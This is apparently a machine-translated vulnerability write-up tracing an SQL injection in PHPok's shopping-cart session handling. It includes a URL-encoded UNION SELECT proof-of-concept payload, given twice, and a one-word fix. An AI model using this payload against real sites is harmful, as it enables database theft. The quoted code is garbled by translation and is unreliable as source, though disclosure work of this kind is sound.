Phpok latest SQL injection and packaging

Phpok latest SQL injection and packaging

The website will load some resource engines during initialization, with a session_file.php loaded for session Initialization.

File framework/engine/session/file. php: function _ construct ($ config) {if (! $ Config |! Is_array ($ config) {$ config ["id"] = "PHPSESSID"; $ config ["path"] = ". /data/session/"; $ config [" timeout "] = 3600;} $ this-> config ($ config); $ sid = $ config [" id "]? $ Config ["id"]: "PHPSESSION"; session_name ($ sid); $ this-> sid = $ sid; $ session_id = isset ($ _ POST [$ sid])? $ _ POST [$ sid]: (isset ($ _ GET [$ sid])? $ _ GET [$ sid]: ""); if ($ session_id) {session_id ($ session_id); $ this-> sessid = $ session_id ;} else {$ this-> sessid = session_id ();} session_save_path ($ config ["path"]); $ this-> config = $ config; $ this-> timeout = $ config ["timeout"]? $ Config ["timeout"]: 600; session_cache_expire (intval ($ this-> timeout)/60); session_cache_limiter ('public'); session_start ();}

$ Session_id = isset ($ _ POST [$ sid])? $ _ POST [$ sid]: (isset ($ _ GET [$ sid])? $ _ GET [$ sid]: "");

Here, $ session_id is obtained directly from get or post without any filtering.

$ This-> sessid = $ session_id;

Save $ session_id.





Look at the file framework/www/cart_control.php:
 

Function _ construct () {parent: control (); // obtain the current shopping cart ID $ this-> cart_id = $ this-> model ('cart ') -> cart_id ($ this-> session-> sessid (), $ _ SESSION ['user _ id']);}

Here, a cart_id method is called. The first parameter is $ this-> session-> sessid ()
 

function sessid($sid=""){if($sid) $this->sessid = $sid;return $this->sessid;}

We can see that $ this-> session-> sessid () is actually the previous $ session_id value.



Look at the cart_id method.
 

Function cart_id ($ sessid, $ uid = 0) {if (! $ Sessid) return false; $ SQL = "SELECT id FROM ". $ this-> db-> prefix. "cart WHERE session_id = '". $ sessid. "'"; $ rs = $ this-> db-> get_one ($ SQL); if (! $ Rs) {$ array = array ('session _ id' => $ sessid, 'user _ id' => $ uid, 'addtime' => $ this-> time); $ id = $ this-> db-> insert_array ($ array, 'cart ');} else {$ id = $ rs ['id'];} // if it is already a member if ($ uid) {$ SQL = "SELECT id FROM ". $ this-> db-> prefix. "cart WHERE user_id = '". $ uid. "'"; $ rs = $ this-> db-> get_one ($ SQL); if ($ rs & $ rs ['id']! = $ Id) {// combine shopping Product Information $ this-> cart_merge ($ rs ['id'], $ id ); // delete the old shopping cart Information $ this-> delete ($ rs ['id']);} // UPDATE the shopping cart attributes $ SQL = "UPDATE ". $ this-> db-> prefix. "cart SET user_id = '". $ uid. "'where id = '". $ id. "'"; $ this-> db-> query ($ SQL);} return $ id ;}

$ SQL = "SELECT id FROM ". $ this-> db-> prefix. "cart WHERE session_id = '". $ sessid. "'"; here, $ sessid is directly brought into the SQL statement. If GPC is not enabled, SQL injection can be implemented. However, there is no echo, and the error is also disabled. You can use time-based blind injection. Of course, we can also use secondary injection, and see the following:



In cart_control.php:
 

Function index_f () {// get the shopping cart list $ rslist = $ this-> model ('cart')-> get_all ($ this-> cart_id);} function checkout_f () {// echo "<pre> ". print_r ($ this-> site, true ). "</pre>"; $ rslist = $ this-> model ('cart')-> get_all ($ this-> cart_id );}

$ This-> model ('cart')-> get_all ($ this-> cart_id );

 

Function get_all ($ cart_id) {if (! $ Cart_id) return false; $ SQL = "SELECT * FROM ". $ this-> db-> prefix. "cart_product WHERE cart_id = '". $ cart_id. "'"; $ rslist = $ this-> db-> get_all ($ SQL); if (! $ Rslist) return false; foreach ($ rslist AS $ key => $ value) {// skip if (! $ Value ['tid']) continue; $ arc_rs = $ this-> call-> phpok ("_ arc ", array ("id" => $ value ['tid']); if ($ arc_rs) {$ value = array_merge ($ arc_rs, $ value ); $ rslist [$ key] = $ value ;}return $ rslist ;}

We can see that cart_id is included in the SQL statement, so that the second injection can be implemented.







Poc: index. php? C = cart & PHPSESSION = % 27% 20 union % 20 select % 20% 27% 5C % 27% 20 union % 20 select % 201% 2C2% 2C3% 2 Cuser % 28% 29% 2C5% 2 Cdatabase % 28% 29% 2C7% 23% 27% 23




 

The same vulnerability also exists in order_control.php:

Class order_control extends phpok_control {function _ construct () {parent: control (); // obtain the current shopping cart ID $ this-> cart_id = $ this-> model ('cart')-> cart_id ($ this-> session-> sessid (), $ _ SESSION ['user _ id']);} // the same error is returned. The same principle is directly introduced to the database: function create_f () {$ rslist = $ this-> model ('cart')-> get_all ($ this-> cart_id); // second injection can be performed here

poc:index.php?c=cart&PHPSESSION=%27%20union%20select%20%27%5C%27%20union%20select%201%2C2%2C3%2Cuser%28%29%2C5%2Cdatabase%28%29%2C7%23%27%23




 

 

Solution:

Filter